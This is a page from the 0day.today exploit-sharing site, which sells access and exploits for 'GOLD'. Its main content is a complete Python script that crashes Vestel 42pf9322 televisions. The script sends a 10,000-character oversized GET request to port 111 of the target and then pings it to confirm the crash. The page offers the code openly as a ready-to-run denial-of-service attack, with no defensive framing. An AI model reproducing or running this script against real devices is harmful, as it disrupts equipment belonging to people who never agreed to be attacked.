0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vestel TV 42pf9322 - Denial of Service Vulnerability
#!/usr/bin/python # Exploit Title: Vestel TV Denial of Service (DoS) Attack # Exploit Author: HackerSofi - hackersofi@gmail.com # Date: 12/09/2013 # CVE Number: # Vendor Homepage: http://www.vestel.com/ # Description: Some TV's Has Communication Port. Vestel 42pf9322 Models TV Using Port 0f 111 For Network Communications. # If You Launch An Attack 0n The Communication Port, Tv System Will Be Crashes. # Special Thanks : DaTaMaN import httplib import sys import os print " ***************************************************************************************" print " Author: HackerSofi - hackersofi@gmail.com \n" print " Exploit: Denial of Service (DoS) attack\n" print " Description:\n" print " Some TV's Has Communication Port. Vestel 42pf9322 Models TV Using Port 0f 111 For Network Communications. " print " If You Launch An Attack 0n The Communication Port, Tv System Will Be Crashes.\n " print " Special Thanks : DaTaMaN " print " ***************************************************************************************\n" # Sends The Request print " Sending The Request...\n" conn = httplib.HTTPConnection(sys.argv[1],111) conn.request("GET", "A"*10000) conn.close() # Checks The Response print " Checking The Status... (CTRL+Z to stop)\n" response = 0 while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Attack Successful!\n" # 0day.today [2024-11-16] #